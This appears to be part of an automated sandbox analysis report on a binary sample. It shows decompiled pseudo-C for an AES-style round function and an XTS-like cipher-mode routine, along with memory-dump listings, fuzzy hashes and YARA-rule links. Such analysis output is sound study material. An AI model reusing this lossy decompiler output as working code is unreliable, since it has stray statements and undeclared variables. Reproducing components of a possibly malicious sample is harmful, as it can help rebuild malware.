                                                              			E00B9F830(signed int __eax, signed int __ebx, signed int __ecx, signed int __edx, signed int* __edi) {
				signed char _t119;
				signed int _t125;
				signed int _t128;
				signed int _t141;
				signed int _t153;
				signed int _t156;
				unsigned int _t170;
				signed int _t174;
				signed int _t188;
				signed int _t193;
				unsigned int _t203;
				signed int _t208;
				signed int* _t310;
				intOrPtr _t427;
				void* _t440;

				 *(_t440 + 0x14) = __edi;
				_t119 = __eax ^  *__edi;
				_t141 = __ebx ^ __edi[1];
				_t170 = __ecx ^ __edi[2];
				_t203 = __edx ^ __edi[3];
				 *((intOrPtr*)(_t440 + 0x18)) = __edi + (__edi[0x3c] + __edi[0x3c] - 2) * 8;
				0;
				do {
					 *(_t440 + 4) =  *(_t427 + (_t119 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t427 + (_t203 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t427 + (_t170 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t427 + (_t141 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
					 *(_t440 + 8) =  *(_t427 + (_t141 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t427 + (_t119 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t427 + (_t203 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t427 + (_t170 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
					_t174 =  *(_t427 + (_t170 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t427 + (_t141 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t427 + (_t119 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t427 + (_t203 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
					_t208 =  *(_t427 + (_t203 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t427 + (_t170 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t427 + (_t141 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t427 + (_t119 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
					_t125 = _t174 + _t174 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t174) >> 0x00000007) & 0x1b1b1b1b;
					_t148 = _t125 + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b;
					asm("rol ecx, 0x8");
					asm("rol eax, 0x18");
					asm("rol ebx, 0x10");
					asm("rol ebp, 0x8");
					_t128 =  *(_t440 + 4);
					 *(_t440 + 0xc) = _t174 ^ _t125 ^ _t174 ^ _t125 + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b ^ _t174 ^ (_t125 + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b) + _t148 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t148) >> 0x00000007) & 0x1b1b1b1b ^ _t125 ^ _t174 ^ (_t125 + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b) + _t148 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t148) >> 0x00000007) & 0x1b1b1b1b ^ _t125 + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b ^ _t174 ^ (_t125 + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b) + _t148 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t148) >> 0x00000007) & 0x1b1b1b1b ^ (_t125 + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b) + _t148 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t148) >> 0x00000007) & 0x1b1b1b1b;
					_t153 = _t208 + _t208 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t208) >> 0x00000007) & 0x1b1b1b1b;
					_t183 = _t153 + _t153 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t153) >> 0x00000007) & 0x1b1b1b1b;
					asm("rol edx, 0x8");
					asm("rol ebx, 0x18");
					asm("rol ecx, 0x10");
					asm("rol ebp, 0x8");
					_t156 =  *(_t440 + 8);
					 *(_t440 + 0x10) = _t208 ^ _t153 ^ _t208 ^ _t153 + _t153 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t153) >> 0x00000007) & 0x1b1b1b1b ^ _t208 ^ (_t153 + _t153 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t153) >> 0x00000007) & 0x1b1b1b1b) + _t183 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t183) >> 0x00000007) & 0x1b1b1b1b ^ _t153 ^ _t208 ^ (_t153 + _t153 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t153) >> 0x00000007) & 0x1b1b1b1b) + _t183 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t183) >> 0x00000007) & 0x1b1b1b1b ^ _t153 + _t153 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t153) >> 0x00000007) & 0x1b1b1b1b ^ _t208 ^ (_t153 + _t153 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t153) >> 0x00000007) & 0x1b1b1b1b) + _t183 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t183) >> 0x00000007) & 0x1b1b1b1b ^ (_t153 + _t153 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t153) >> 0x00000007) & 0x1b1b1b1b) + _t183 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t183) >> 0x00000007) & 0x1b1b1b1b;
					_t188 = _t128 + _t128 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t128) >> 0x00000007) & 0x1b1b1b1b;
					_t217 = _t188 + _t188 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t188) >> 0x00000007) & 0x1b1b1b1b;
					asm("rol eax, 0x8");
					asm("rol ecx, 0x18");
					asm("rol edx, 0x10");
					asm("rol ebp, 0x8");
					_t193 = _t156 + _t156 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t156) >> 0x00000007) & 0x1b1b1b1b;
					_t222 = _t193 + _t193 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t193) >> 0x00000007) & 0x1b1b1b1b;
					asm("rol ebx, 0x8");
					asm("rol ecx, 0x18");
					asm("rol edx, 0x10");
					asm("rol ebp, 0x8");
					_t427 =  *((intOrPtr*)(_t440 + 0x1c));
					_t310 =  &(( *(_t440 + 0x14))[4]);
					_t119 = _t128 ^ _t188 ^ _t128 ^ _t188 + _t188 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t188) >> 0x00000007) & 0x1b1b1b1b ^ _t128 ^ (_t188 + _t188 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t188) >> 0x00000007) & 0x1b1b1b1b) + _t217 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t217) >> 0x00000007) & 0x1b1b1b1b ^ _t188 ^ _t128 ^ (_t188 + _t188 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t188) >> 0x00000007) & 0x1b1b1b1b) + _t217 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t217) >> 0x00000007) & 0x1b1b1b1b ^ _t188 + _t188 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t188) >> 0x00000007) & 0x1b1b1b1b ^ _t128 ^ (_t188 + _t188 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t188) >> 0x00000007) & 0x1b1b1b1b) + _t217 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t217) >> 0x00000007) & 0x1b1b1b1b ^ (_t188 + _t188 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t188) >> 0x00000007) & 0x1b1b1b1b) + _t217 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t217) >> 0x00000007) & 0x1b1b1b1b ^  *_t310;
					_t141 = _t156 ^ _t193 ^ _t156 ^ _t193 + _t193 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t193) >> 0x00000007) & 0x1b1b1b1b ^ _t156 ^ (_t193 + _t193 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t193) >> 0x00000007) & 0x1b1b1b1b) + _t222 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t222) >> 0x00000007) & 0x1b1b1b1b ^ _t193 ^ _t156 ^ (_t193 + _t193 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t193) >> 0x00000007) & 0x1b1b1b1b) + _t222 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t222) >> 0x00000007) & 0x1b1b1b1b ^ _t193 + _t193 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t193) >> 0x00000007) & 0x1b1b1b1b ^ _t156 ^ (_t193 + _t193 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t193) >> 0x00000007) & 0x1b1b1b1b) + _t222 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t222) >> 0x00000007) & 0x1b1b1b1b ^ (_t193 + _t193 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t193) >> 0x00000007) & 0x1b1b1b1b) + _t222 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t222) >> 0x00000007) & 0x1b1b1b1b ^ _t310[1];
					_t170 =  *(_t440 + 0xc) ^ _t310[2];
					_t203 =  *(_t440 + 0x10) ^ _t310[3];
					 *(_t440 + 0x14) = _t310;
				} while (_t310 <  *((intOrPtr*)(_t440 + 0x18)));
				 *(_t440 + 4) =  *(_t427 + (_t119 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t427 + (_t203 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t427 + (_t170 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t427 + (_t141 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
				 *(_t440 + 8) =  *(_t427 + (_t141 & 0x000000ff) - 0x80) & 0x000000ff ^ ( *(_t427 + (_t119 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000008 ^ ( *(_t427 + (_t203 >> 0x00000010 & 0x000000ff) - 0x80) & 0x000000ff) << 0x00000010 ^ ( *(_t427 + (_t170 >> 0x18) - 0x80) & 0x000000ff) << 0x00000018;
				return  *(_t440 + 4) ^ ( *(_t440 + 0x14))[4];
			}


















                                                              0x00b9f830
                                                              0x00b9f834
                                                              0x00b9f836
                                                              0x00b9f839
                                                              0x00b9f83c
                                                              0x00b9f84c
                                                              0x00b9f86e
                                                              0x00b9f870
                                                              0x00b9f8ae
                                                              0x00b9f8f0
                                                              0x00b9f94a
                                                              0x00b9f96a
                                                              0x00b9f988
                                                              0x00b9f9a9
                                                              0x00b9f9ca
                                                              0x00b9f9d7
                                                              0x00b9f9dc
                                                              0x00b9f9e1
                                                              0x00b9f9e6
                                                              0x00b9f9ec
                                                              0x00b9fa0d
                                                              0x00b9fa2e
                                                              0x00b9fa4f
                                                              0x00b9fa5c
                                                              0x00b9fa61
                                                              0x00b9fa66
                                                              0x00b9fa6b
                                                              0x00b9fa71
                                                              0x00b9fa92
                                                              0x00b9fab3
                                                              0x00b9fad4
                                                              0x00b9fae1
                                                              0x00b9fae6
                                                              0x00b9faeb
                                                              0x00b9fb0f
                                                              0x00b9fb30
                                                              0x00b9fb51
                                                              0x00b9fb5e
                                                              0x00b9fb63
                                                              0x00b9fb68
                                                              0x00b9fb7b
                                                              0x00b9fb7f
                                                              0x00b9fb82
                                                              0x00b9fb84
                                                              0x00b9fb87
                                                              0x00b9fb8a
                                                              0x00b9fb91
                                                              0x00b9fb91
                                                              0x00b9fbd9
                                                              0x00b9fc1b
                                                              0x00b9fcaf

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01b1297a424d3e39430ecae581cbbc167fce1ddec024d9f867a3e2aac9254bbd
                                                              • Instruction ID: db54121c83a10348ae51b35bc939bb9935a6b769c24c3e6fc7763897f8bfd582
                                                              • Opcode Fuzzy Hash: 01b1297a424d3e39430ecae581cbbc167fce1ddec024d9f867a3e2aac9254bbd
                                                              • Instruction Fuzzy Hash: B8C12A73E24B7906D7649E7F8C400A9B6E39FC4120F9F47BDDC98A7342C930690A86D0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BC9690, Relevance: .3, Instructions: 336COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: dd09723fc643d0e2ee6b257d94cca0fce2373df82c73f826f93028f387d61145
                                                              • Instruction ID: 47aeaaac46cadc797a226e4c34e547b17c64e59c69488b17d9ed8be6dbaff1af
                                                              • Opcode Fuzzy Hash: dd09723fc643d0e2ee6b257d94cca0fce2373df82c73f826f93028f387d61145
                                                              • Instruction Fuzzy Hash: 3DB14D72700B164BD728EEA9DC91796B3E3AB84326F8EC73C9046C6F55F2BCA4454680
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B996B0, Relevance: .3, Instructions: 334COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 01eef35076e03c2ca61ca294521eaf8e3a6a0edeb0c2c68d9f1c504fd829c17a
                                                              • Instruction ID: 58af92707fcffe75dc7a8cf830905ba58bf6bd22fe011ea109a0b16b5680ea3b
                                                              • Opcode Fuzzy Hash: 01eef35076e03c2ca61ca294521eaf8e3a6a0edeb0c2c68d9f1c504fd829c17a
                                                              • Instruction Fuzzy Hash: C5E17E21C1DFDA87D6129B3E8542166F3A0BFFB288F14DB1AFDD435422EB61B2D59240
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA3CD0, Relevance: .3, Instructions: 302COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 77%
                                                              			E00BA3CD0(intOrPtr __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t192;
				signed int _t194;
				void* _t196;
				signed int _t199;
				intOrPtr* _t205;
				intOrPtr* _t209;
				signed int* _t217;
				intOrPtr* _t218;
				intOrPtr* _t226;
				signed int _t229;
				signed int _t230;
				signed char _t235;
				signed int _t237;
				intOrPtr _t238;
				intOrPtr _t241;
				signed int _t243;
				signed char* _t244;
				signed int _t251;
				intOrPtr _t254;
				intOrPtr _t255;
				signed int _t256;
				char* _t274;
				signed int _t287;
				signed int _t289;
				signed int _t301;
				signed int _t307;
				void* _t310;
				intOrPtr _t312;
				void* _t315;
				void* _t320;
				void* _t325;
				signed int _t329;
				signed int* _t331;
				intOrPtr _t332;
				intOrPtr _t333;
				intOrPtr _t334;
				signed int* _t336;
				intOrPtr _t337;
				void* _t338;
				intOrPtr _t342;
				intOrPtr _t354;
				signed int _t356;
				signed int _t360;
				intOrPtr _t362;
				signed int _t370;
				void* _t371;
				void* _t372;

				E00C6BB10(0x4c);
				_t192 =  *0xcc5970; // 0x851ab4dd
				 *(_t370 + 0x48) = _t192 ^ _t370;
				_t255 =  *((intOrPtr*)(_t370 + 0x50));
				_t194 =  *(_t370 + 0x54);
				_t235 =  *(_t370 + 0x64);
				_t336 =  *(_t370 + 0x60);
				_t331 =  *(_t370 + 0x68);
				 *((intOrPtr*)(_t370 + 0x18)) = _t255;
				if(_t235 >= 0x10) {
					 *((intOrPtr*)(_t370 + 0x34)) =  *_t194;
					 *((intOrPtr*)(_t370 + 0x38)) =  *((intOrPtr*)(_t194 + 4));
					 *((intOrPtr*)(_t370 + 0x3c)) =  *((intOrPtr*)(_t194 + 8));
					 *((intOrPtr*)(_t370 + 0x40)) =  *((intOrPtr*)(_t194 + 0xc));
					_t196 = _t370 + 0x38;
					 *((intOrPtr*)( *((intOrPtr*)(_t255 + 0xc))))(_t196, _t196,  *((intOrPtr*)(_t255 + 4)));
					_t371 = _t370 + 0xc;
					if( *((intOrPtr*)(_t371 + 0x70)) == 0 && (_t235 & 0x0000000f) != 0) {
						_t235 = _t235 - 0x10;
						 *(_t371 + 0x6c) = _t235;
					}
					_t301 =  *(_t371 + 0x40);
					_t199 =  *(_t371 + 0x3c);
					_t256 =  *(_t371 + 0x38);
					_t356 =  *(_t371 + 0x38);
					if(_t235 < 0x10) {
						L8:
						if( *((intOrPtr*)(_t371 + 0x74)) == 0) {
							_t237 = _t301 >> 0x0000001f & 0x00000087 ^ _t356 + _t356;
							 *(_t371 + 0x4c) = 0;
							_t307 =  *(_t371 + 0x4c) ^ (_t256 << 0x00000020 | _t356) << 0x1;
							_t360 = _t256 >> 0x0000001f | _t199 + _t199;
							 *(_t371 + 0x24) = 0;
							 *(_t371 + 0x54) =  *(_t371 + 0x24) | ( *(_t371 + 0x44) << 0x00000020 | _t199) << 0x1;
							 *(_t371 + 0x28) =  *_t336 ^ _t237;
							 *(_t371 + 0x4c) = _t307;
							 *(_t371 + 0x2c) = _t336[1] ^ _t307;
							_t205 =  *((intOrPtr*)(_t371 + 0x1c));
							 *(_t371 + 0x30) = _t336[2] ^ _t360;
							 *(_t371 + 0x34) = _t336[3] ^  *(_t371 + 0x54);
							_t310 = _t371 + 0x2c;
							 *((intOrPtr*)( *((intOrPtr*)(_t205 + 8))))(_t310, _t310,  *_t205);
							_t312 =  *((intOrPtr*)(_t371 + 0x7c));
							 *(_t371 + 0x34) =  *(_t371 + 0x34) ^ _t237;
							 *(_t371 + 0x38) =  *(_t371 + 0x38) ^  *(_t371 + 0x58);
							 *(_t371 + 0x3c) =  *(_t371 + 0x3c) ^ _t360;
							 *(_t371 + 0x40) =  *(_t371 + 0x40) ^  *(_t371 + 0x60);
							_t372 = _t371 + 0xc;
							if(_t312 > 0) {
								_t274 = _t372 + 0x28;
								_t217 =  &(_t331[4]);
								_t338 = _t336 - _t331;
								_t362 = _t312;
								do {
									 *_t217 =  *_t274;
									 *_t274 =  *((intOrPtr*)(_t217 + _t338));
									_t217 =  &(_t217[0]);
									_t274 = _t274 + 1;
									_t362 = _t362 - 1;
								} while (_t362 != 0);
							}
							 *(_t372 + 0x28) =  *(_t372 + 0x28) ^  *(_t372 + 0x38);
							 *(_t372 + 0x2c) =  *(_t372 + 0x2c) ^  *(_t372 + 0x3c);
							_t209 =  *((intOrPtr*)(_t372 + 0x1c));
							 *(_t372 + 0x30) =  *(_t372 + 0x30) ^  *(_t372 + 0x40);
							 *(_t372 + 0x34) =  *(_t372 + 0x34) ^  *(_t372 + 0x44);
							_t315 = _t372 + 0x2c;
							 *((intOrPtr*)( *((intOrPtr*)(_t209 + 8))))(_t315, _t315,  *_t209);
							_t318 =  *(_t372 + 0x3c) ^  *(_t372 + 0x4c);
							 *_t331 =  *(_t372 + 0x34) ^  *(_t372 + 0x44);
							_t373 = _t372 + 0xc;
							_t331[1] =  *(_t372 + 0x38) ^  *(_t372 + 0x48);
							_t331[2] =  *(_t372 + 0x3c) ^  *(_t372 + 0x4c);
							_t331[3] =  *(_t372 + 0x40) ^  *(_t372 + 0x50);
							goto L18;
						} else {
							 *(_t371 + 0x14) = 0;
							if( *((intOrPtr*)(_t371 + 0x70)) > 0) {
								 *((intOrPtr*)(_t371 + 0x20)) = _t336 - _t331;
								_t243 = _t331 - _t371 + 0x28;
								 *(_t371 + 0x48) = _t243;
								while(1) {
									_t244 =  &((_t371 +  *(_t371 + 0x14) + 0x28)[_t243]);
									 *(_t371 + 0x18) = _t244;
									 *(_t371 + 0x13) = _t244[ *((intOrPtr*)(_t371 + 0x20))] & 0x000000ff;
									 *( *(_t371 + 0x18)) =  *(_t371 +  *(_t371 + 0x14) + 0x28) & 0x000000ff;
									 *(_t371 + 0x14) =  *(_t371 + 0x14) + 1;
									 *(_t371 +  *(_t371 + 0x14) + 0x28) =  *(_t371 + 0x13) & 0x000000ff;
									if( *(_t371 + 0x14) >=  *((intOrPtr*)(_t371 + 0x70))) {
										goto L13;
									}
									_t243 =  *(_t371 + 0x48);
								}
							}
							L13:
							 *(_t371 + 0x30) =  *(_t371 + 0x30) ^ _t199;
							_t218 =  *((intOrPtr*)(_t371 + 0x1c));
							 *(_t371 + 0x2c) =  *(_t371 + 0x2c) ^ _t256;
							 *(_t371 + 0x34) =  *(_t371 + 0x34) ^ _t301;
							 *(_t371 + 0x28) =  *(_t371 + 0x28) ^ _t356;
							_t320 = _t371 + 0x2c;
							 *((intOrPtr*)( *((intOrPtr*)(_t218 + 8))))( *_t218);
							 *(_t331 - 0x10) =  *(_t371 + 0x34) ^  *(_t371 + 0x44);
							 *(_t331 - 0xc) =  *(_t371 + 0x38) ^  *(_t371 + 0x48);
							 *(_t331 - 8) =  *(_t371 + 0x3c) ^  *(_t371 + 0x4c);
							 *(_t331 - 4) =  *(_t371 + 0x40) ^  *(_t371 + 0x50);
							_t333 = _t320;
							_t342 = _t320;
							_pop(_t241);
							return E00C69C26(0, _t241,  *(_t371 + 0x54) ^ _t371 + 0x0000000c,  *(_t371 + 0x3c) ^  *(_t371 + 0x4c), _t333, _t342);
						}
					} else {
						while(1) {
							 *(_t371 + 0x34) = _t336[3] ^ _t301;
							_t226 =  *((intOrPtr*)(_t371 + 0x1c));
							 *(_t371 + 0x30) = _t336[2] ^ _t199;
							_t325 = _t371 + 0x2c;
							 *(_t371 + 0x34) =  *_t336 ^ _t356;
							 *(_t371 + 0x38) = _t336[1] ^ _t256;
							 *((intOrPtr*)( *((intOrPtr*)(_t226 + 8))))(_t325, _t325,  *_t226);
							_t318 =  *(_t371 + 0x44);
							_t251 =  *(_t371 + 0x48);
							_t287 =  *(_t371 + 0x38) ^ _t251;
							_t229 =  *(_t371 + 0x34) ^ _t318;
							_t331[1] = _t287;
							 *(_t371 + 0x38) = _t287;
							_t289 =  *(_t371 + 0x40) ^  *(_t371 + 0x50);
							 *_t331 = _t229;
							 *(_t371 + 0x34) = _t229;
							_t230 =  *(_t371 + 0x4c);
							 *(_t371 + 0x3c) =  *(_t371 + 0x3c) ^ _t230;
							_t331[2] =  *(_t371 + 0x3c);
							_t331[3] = _t289;
							_t373 = _t371 + 0xc;
							_t336 =  &(_t336[4]);
							_t331 =  &(_t331[4]);
							_t52 = _t373 + 0x70;
							 *_t52 =  *((intOrPtr*)(_t373 + 0x70)) - 0x10;
							 *(_t373 + 0x34) = _t289;
							if( *_t52 == 0) {
								break;
							}
							_t356 =  *(_t373 + 0x44) >> 0x0000001f & 0x00000087 ^ _t318 + _t318;
							_t329 = ( *(_t373 + 0x44) << 0x00000020 | _t230) << 1;
							 *(_t373 + 0x18) = _t251 >> 0x1f;
							_t256 = 0 ^ (_t251 << 0x00000020 | _t318) << 0x1;
							_t199 = _t230 + _t230 |  *(_t373 + 0x18);
							 *(_t373 + 0x24) = _t329;
							_t301 = _t329;
							 *(_t373 + 0x38) = _t356;
							 *(_t373 + 0x3c) = _t256;
							 *(_t373 + 0x40) = _t199;
							 *(_t373 + 0x44) = _t301;
							if( *((intOrPtr*)(_t373 + 0x70)) >= 0x10) {
								continue;
							} else {
								goto L8;
							}
							goto L19;
						}
						L18:
						_pop(_t332);
						_pop(_t337);
						_pop(_t238);
						return E00C69C26(0, _t238,  *(_t373 + 0x58) ^ _t373, _t318, _t332, _t337);
					}
				} else {
					_pop(_t334);
					_pop(_t354);
					_pop(_t254);
					return E00C69C26(_t194 | 0xffffffff, _t254,  *(_t370 + 0x48) ^ _t370, __edx, _t334, _t354);
				}
				L19:
			}





















































                                                              0x00ba3cd5
                                                              0x00ba3cda
                                                              0x00ba3ce1
                                                              0x00ba3ce5
                                                              0x00ba3ce9
                                                              0x00ba3cee
                                                              0x00ba3cf3
                                                              0x00ba3cf8
                                                              0x00ba3cfc
                                                              0x00ba3d03
                                                              0x00ba3d1c
                                                              0x00ba3d23
                                                              0x00ba3d2d
                                                              0x00ba3d34
                                                              0x00ba3d39
                                                              0x00ba3d44
                                                              0x00ba3d46
                                                              0x00ba3d4e
                                                              0x00ba3d55
                                                              0x00ba3d58
                                                              0x00ba3d58
                                                              0x00ba3d5c
                                                              0x00ba3d60
                                                              0x00ba3d64
                                                              0x00ba3d69
                                                              0x00ba3d70
                                                              0x00ba3e53
                                                              0x00ba3e58
                                                              0x00ba3f55
                                                              0x00ba3f59
                                                              0x00ba3f65
                                                              0x00ba3f73
                                                              0x00ba3f75
                                                              0x00ba3f87
                                                              0x00ba3f90
                                                              0x00ba3f97
                                                              0x00ba3fa4
                                                              0x00ba3fa8
                                                              0x00ba3fac
                                                              0x00ba3fb2
                                                              0x00ba3fb7
                                                              0x00ba3fc2
                                                              0x00ba3fcc
                                                              0x00ba3fd0
                                                              0x00ba3fd4
                                                              0x00ba3fd8
                                                              0x00ba3fdc
                                                              0x00ba3fe0
                                                              0x00ba3fe5
                                                              0x00ba3fe7
                                                              0x00ba3feb
                                                              0x00ba3fee
                                                              0x00ba3ff0
                                                              0x00ba3ff2
                                                              0x00ba3ff7
                                                              0x00ba3ff9
                                                              0x00ba3ffb
                                                              0x00ba3ffc
                                                              0x00ba3ffd
                                                              0x00ba3ffd
                                                              0x00ba3ff2
                                                              0x00ba400a
                                                              0x00ba4012
                                                              0x00ba4016
                                                              0x00ba401a
                                                              0x00ba4024
                                                              0x00ba4029
                                                              0x00ba4034
                                                              0x00ba404a
                                                              0x00ba404e
                                                              0x00ba4054
                                                              0x00ba405b
                                                              0x00ba405e
                                                              0x00ba4061
                                                              0x00000000
                                                              0x00ba3e5e
                                                              0x00ba3e63
                                                              0x00ba3e6b
                                                              0x00ba3e6f
                                                              0x00ba3e79
                                                              0x00ba3e7b
                                                              0x00ba3e85
                                                              0x00ba3e8d
                                                              0x00ba3e8f
                                                              0x00ba3ea5
                                                              0x00ba3eb0
                                                              0x00ba3ebb
                                                              0x00ba3ec3
                                                              0x00ba3ecd
                                                              0x00000000
                                                              0x00000000
                                                              0x00ba3e81
                                                              0x00ba3e81
                                                              0x00ba3e85
                                                              0x00ba3ecf
                                                              0x00ba3ecf
                                                              0x00ba3ed3
                                                              0x00ba3ed7
                                                              0x00ba3edd
                                                              0x00ba3ee1
                                                              0x00ba3ee6
                                                              0x00ba3ef1
